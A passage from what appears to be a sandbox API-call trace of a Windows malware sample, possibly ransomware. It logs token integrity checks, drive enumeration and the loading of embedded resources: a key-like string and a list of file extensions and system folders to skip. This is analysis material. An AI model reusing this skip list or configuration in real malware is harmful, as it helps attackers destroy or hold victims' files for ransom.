[5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14b7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0115.593] EqualSid (pSid1=0x706438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14b7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0115.593] GetCurrentProcess () returned 0xffffffff [0115.593] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0115.593] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0115.593] GetLastError () returned 0x7a [0115.593] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x7076d8 [0115.593] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x7076d8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x7076d8, ReturnLength=0x12fc64) returned 1 [0115.593] GetSidSubAuthorityCount (pSid=0x7076e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x7076e1 [0115.593] GetSidSubAuthority (pSid=0x7076e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x7076e8 [0115.593] LocalFree (hMem=0x7076d8) returned 0x0 [0115.593] CloseHandle (hObject=0xb8) returned 1 [0115.593] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.595] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0115.595] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0115.595] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0115.595] LockResource (hResData=0x516824) returned 0x516824 [0115.595] FreeResource (hResData=0x516824) returned 0 [0115.595] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.595] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.595] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.595] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.595] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.595] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505008, cbMultiByte=38, lpWideCharStr=0x14fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.595] FreeResource (hResData=0x50d64c) returned 0 [0115.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x150500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.596] GetCurrentThreadId () returned 0xdec [0115.596] GetCurrentThreadId () returned 0xdec [0115.596] GetCurrentThreadId () returned 0xdec [0115.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1490128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0115.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1490128, cbMultiByte=615, lpWideCharStr=0x149c65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0115.599] CompareStringW (Locale=0x400, 